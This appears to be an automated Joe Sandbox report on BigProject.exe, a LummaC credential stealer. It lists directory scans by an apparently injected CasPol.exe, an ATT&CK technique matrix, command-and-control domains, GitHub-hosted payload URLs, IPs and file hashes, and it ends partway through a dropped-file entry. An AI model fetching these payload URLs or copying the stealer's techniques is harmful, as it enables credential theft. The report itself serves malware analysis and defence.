Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 7404, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	1 Masquerading	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Virtualization/Sandbox Evasion	LSASS Memory	1 Query Registry	Remote Desktop Protocol	41 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	121 Security Software Discovery	SMB/Windows Admin Shares	2 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	11 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	11 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	24 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
BigProject.exe	15%	Virustotal		Browse
BigProject.exe	16%	ReversingLabs

Name	IP	Active	Malicious	Reputation
raw.githubusercontent.com	185.199.110.133	true	false	high
discokeyus.lat	172.67.197.170	true	false	high
x1.i.lencr.org	unknown	unknown	false	high
grannyejh.lat	unknown	unknown	false	high
stem-mellows.cyou	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
necklacebudi.lat	false	high
https://discokeyus.lat/api	false	high
aspecteirs.lat	false	high
energyaffai.lat	false	high
sustainskelet.lat	false	high
crosshuaht.lat	false	high
rapeflowwj.lat	false	high
grannyejh.lat	false	high
discokeyus.lat	false	high
https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiion	false	high
https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/NavanItinerary.pdf	false	high
stem-mellows.cyou	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://x1.i.lencr.org/	2D85F72862B55C4EADD9E66E06947F3D0.3.dr	false	high
https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiionD	BigProject.exe, 00000000.00000002.2453321140.00000000011A0000.00000004.00000020.00020000.00000000.sdmp	false	high
https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiionC	BigProject.exe, 00000000.00000002.2453321140.00000000011F0000.00000004.00000020.00020000.00000000.sdmp	false	high
https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiionw	BigProject.exe, 00000000.00000002.2453321140.00000000011F0000.00000004.00000020.00020000.00000000.sdmp	false	high
https://discokeyus.lat/apis	CasPol.exe, 00000007.00000002.2451042718.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiion8Nzk	BigProject.exe, 00000000.00000002.2453321140.00000000011A0000.00000004.00000020.00020000.00000000.sdmp	false	high
https://discokeyus.lat/cYU5	CasPol.exe, 00000007.00000002.2452106893.0000000003442000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	CasPol.exe, 00000007.00000002.2452004141.0000000003440000.00000004.00000800.00020000.00000000.sdmp	false	high
https://raw.githubusercontent.com/	BigProject.exe, 00000000.00000002.2453321140.0000000001183000.00000004.00000020.00020000.00000000.sdmp	false	high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.999	CasPol.exe, 00000007.00000002.2452004141.0000000003440000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://discokeyus.lat/v	CasPol.exe, 00000007.00000002.2451042718.0000000000DA2000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://raw.githubusercontent.com/Q	BigProject.exe, 00000000.00000002.2453321140.0000000001183000.00000004.00000020.00020000.00000000.sdmp	false	high
https://discokeyus.lat/	CasPol.exe, 00000007.00000002.2451042718.0000000000DA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.2452106893.0000000003442000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	CasPol.exe, 00000007.00000002.2452004141.0000000003440000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.199.110.133	raw.githubusercontent.com	Netherlands		54113	FASTLYUS	false
172.67.197.170	discokeyus.lat	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1579291
Start date and time:	2024-12-21 13:16:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	BigProject.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@18/46@7/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 73% Number of executed functions: 25 Number of non-executed functions: 76
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.218.208.137, 162.159.61.3, 172.64.41.3, 2.22.50.131, 2.22.50.144, 3.233.129.217, 52.6.155.20, 52.22.41.97, 3.219.243.226, 23.195.39.65, 184.30.20.134, 23.32.239.56, 2.19.198.27, 23.192.153.142, 13.107.246.63, 20.109.210.53, 92.122.16.236, 4.175.87.197
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, e4578.dscb.akamaiedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, p13n.adobe.io, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ssl.adobe.com.edgekey.net, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
07:17:18	API Interceptor	8x Sleep call for process: CasPol.exe modified
07:17:28	API Interceptor	2x Sleep call for process: AcroCEF.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.199.110.133	sys_upd.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	cr_asm_menu..ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	cr_asm_phshop..ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	cr_asm_atCAD.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	vF20HtY4a4.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	xK44OOt7vD.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	Lm9IJ4r9oO.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	cr_asm_crypter.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll	Get hash	malicious	Metasploit	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_mnr.txt
172.67.197.170	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, SystemBC, zgRAT	Browse
	hBBxlxfQ3F.exe	Get hash	malicious	LummaC, Stealc	Browse
	zhQFKte2vX.exe	Get hash	malicious	LummaC	Browse
	ddySsHnC6l.exe	Get hash	malicious	LummaC	Browse
	XNtOBQ5NHr.exe	Get hash	malicious	LummaC, Stealc	Browse
	Z8oTIWCyDE.exe	Get hash	malicious	LummaC	Browse
	BB4S2ErvqK.exe	Get hash	malicious	LummaC	Browse
	rEK6Z2DVp8.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
raw.githubusercontent.com	Set-up!.exe	Get hash	malicious	LummaC	Browse	185.199.108.133
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	185.199.108.133
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	185.199.111.133
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	185.199.108.133
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	185.199.110.133
	58VSNPxrI4.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	185.199.110.133
	file.exe	Get hash	malicious	ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar	Browse	185.199.109.133
	Tii6ue74NB.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Vidar	Browse	185.199.108.133
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS	Browse	185.199.109.133
discokeyus.lat	Set-up!.exe	Get hash	malicious	LummaC	Browse	104.21.21.99
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	104.21.21.99
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Vidar, Xmrig	Browse	172.67.197.170
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	104.21.21.99
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, SystemBC, zgRAT	Browse	172.67.197.170
	hBBxlxfQ3F.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.197.170
	gf3yK6i4OX.exe	Get hash	malicious	LummaC	Browse	104.21.21.99
	0WO49yZcDA.exe	Get hash	malicious	LummaC	Browse	104.21.21.99
	uDTW3VjJJT.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.21.99
	u1z7S3hr06.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.21.99

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FASTLYUS	Set-up!.exe	Get hash	malicious	LummaC	Browse	185.199.108.133
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	185.199.108.133
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	185.199.111.133
	ORDER-241221K6890PF57682456POC7893789097393.j.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	199.232.192.209
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	185.199.108.133
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.199.110.133
	https://gADK.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/	Get hash	malicious	Unknown	Browse	151.101.66.137
	YearEnd_Benefit_Bonus_Payout__Details__ChasChas.html	Get hash	malicious	Unknown	Browse	151.101.66.137
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	185.199.110.133
	https://contractorssteelform1flows.powerappsportals.com/	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
CLOUDFLARENETUS	setup.msi	Get hash	malicious	Unknown	Browse	172.67.164.25
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.18.185
	Full-Setup.exe	Get hash	malicious	LummaC	Browse	104.21.43.127
	jqplot.hta	Get hash	malicious	Unknown	Browse	104.21.90.205
	setup.exe	Get hash	malicious	LummaC	Browse	104.21.84.113
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.42.70
	setup.exe	Get hash	malicious	LummaC	Browse	172.67.191.144
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	Full-Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.179.135
	Set-up!.exe	Get hash	malicious	LummaC	Browse	104.21.6.74

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.197.170
	Full-Setup.exe	Get hash	malicious	LummaC	Browse	172.67.197.170
	jqplot.hta	Get hash	malicious	Unknown	Browse	172.67.197.170
	setup.exe	Get hash	malicious	LummaC	Browse	172.67.197.170
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.197.170
	setup.exe	Get hash	malicious	LummaC	Browse	172.67.197.170
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.197.170
	Full-Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.197.170
	Set-up!.exe	Get hash	malicious	LummaC	Browse	172.67.197.170
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	172.67.197.170
37f463bf4616ecd445d4a1937da06e19	setup.msi	Get hash	malicious	Unknown	Browse	185.199.110.133
	jqplot.hta	Get hash	malicious	Unknown	Browse	185.199.110.133
	Set-up!.exe	Get hash	malicious	LummaC	Browse	185.199.110.133
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	185.199.110.133
	Oggq2dY6kx.exe	Get hash	malicious	Azorult	Browse	185.199.110.133
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	185.199.110.133
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	185.199.110.133
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Vidar, Xmrig	Browse	185.199.110.133
	Setup.msi	Get hash	malicious	Unknown	Browse	185.199.110.133
	q9bzWO2X1r.msi	Get hash	malicious	Unknown	Browse	185.199.110.133

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.233495543197344
Encrypted:	false
SSDEEP:	6:BIH9+i+q2P92nKuAl9OmbnIFUt8wIH7+E2WZmw+wIH8VkwO92nKuAl9OmbjLJ:BIHci+v4HAahFUt8wIH7qW/+wIH8V5LC
MD5:	A7E05C6A8EBEC5B37FC501D1C73D5B86
SHA1:	290036F31B65CA5B4F0E785E8F22231FCE9E724E
SHA-256:	816BE9C382719A983AF5A51350673DD6251E9E01FFCD02898F24BA150EE3762D
SHA-512:	AD63431FD38D6561A71F9CA890A116112D65B293829494537A943A523BB21E975EF87968FC1AA5C5708431C571FBAE1C7F4F35E85C6F3F8A6DC1532AA63BE0C3
Malicious:	false
Reputation:	low
Preview:	2024/12/21-07:17:16.880 65c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/21-07:17:16.886 65c Recovering log #3.2024/12/21-07:17:16.887 65c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.233495543197344
Encrypted:	false
SSDEEP:	6:BIH9+i+q2P92nKuAl9OmbnIFUt8wIH7+E2WZmw+wIH8VkwO92nKuAl9OmbjLJ:BIHci+v4HAahFUt8wIH7qW/+wIH8V5LC
MD5:	A7E05C6A8EBEC5B37FC501D1C73D5B86
SHA1:	290036F31B65CA5B4F0E785E8F22231FCE9E724E
SHA-256:	816BE9C382719A983AF5A51350673DD6251E9E01FFCD02898F24BA150EE3762D
SHA-512:	AD63431FD38D6561A71F9CA890A116112D65B293829494537A943A523BB21E975EF87968FC1AA5C5708431C571FBAE1C7F4F35E85C6F3F8A6DC1532AA63BE0C3
Malicious:	false
Reputation:	low
Preview:	2024/12/21-07:17:16.880 65c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/21-07:17:16.886 65c Recovering log #3.2024/12/21-07:17:16.887 65c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	335
Entropy (8bit):	5.180157907612413
Encrypted:	false
SSDEEP:	6:BIS38+q2P92nKuAl9Ombzo2jMGIFUt8wISI2dXZmw+wIS5Q3VkwO92nKuAl9OmbX:BIwv4HAa8uFUt8wI2/+wIY85LHAa8RJ
MD5:	12D346B4ECE4395214F39C5F0864ACC6
SHA1:	E1D5A599A80D525A37DCBD87F7C0DEE9A658D61A
SHA-256:	7E14E51FB5D2A4338846C5B58C7AFA9B485D3439C862E63018153ED8EE250B98
SHA-512:	4F2FEE3FF13D1CFE4D4D3FD466681595624F5C568A77D6A79ECB9A621768EA7F4F3A676E7AD94C26836988BD1BAEFF1F5B5A7C3A9C031BEF8551ABAA906A9D02
Malicious:	false
Reputation:	low
Preview:	2024/12/21-07:17:17.037 e68 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/21-07:17:17.038 e68 Recovering log #3.2024/12/21-07:17:17.039 e68 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	335
Entropy (8bit):	5.180157907612413
Encrypted:	false
SSDEEP:	6:BIS38+q2P92nKuAl9Ombzo2jMGIFUt8wISI2dXZmw+wIS5Q3VkwO92nKuAl9OmbX:BIwv4HAa8uFUt8wI2/+wIY85LHAa8RJ
MD5:	12D346B4ECE4395214F39C5F0864ACC6
SHA1:	E1D5A599A80D525A37DCBD87F7C0DEE9A658D61A
